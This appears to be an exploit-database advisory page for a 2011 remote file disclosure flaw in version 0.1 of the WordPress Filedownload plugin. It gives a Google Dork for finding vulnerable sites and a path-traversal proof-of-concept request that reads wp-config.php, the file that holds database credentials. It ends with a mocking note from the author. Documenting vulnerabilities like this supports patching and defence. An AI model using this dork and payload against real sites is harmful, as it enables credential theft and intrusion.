header-logo
Suggest Exploit
vendor:
Filedownload Plugin
by:
Septemb0x
7.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: Filedownload Plugin
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability

The WordPress Filedownload Plugin 0.1 is vulnerable to a remote file disclosure vulnerability. An attacker can exploit this vulnerability by sending a crafted request to the download.php file with the path parameter set to the path of the file they wish to disclose. This vulnerability can be exploited by using the Google Dork 'inurl:/wp-content/plugins/filedownload/download.php/?path'

Mitigation:

Update to the latest version of the WordPress Filedownload Plugin.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
# Google Dork: inurl:"/wp-content/plugins/filedownload/download.php/?path"
# Date: 18-09-2011
# Author: Septemb0x ( CYBER-WARRIOR )
# Software Link: http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
# Version: 0.1


POC : /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
     

# NOTE: Kendini Birþey Zanneden Velet  Senin Hiç Böyle Bug'n Oldumu ki Sitelerime Ýndex Basasýn? Öptüm Büyüde Gel.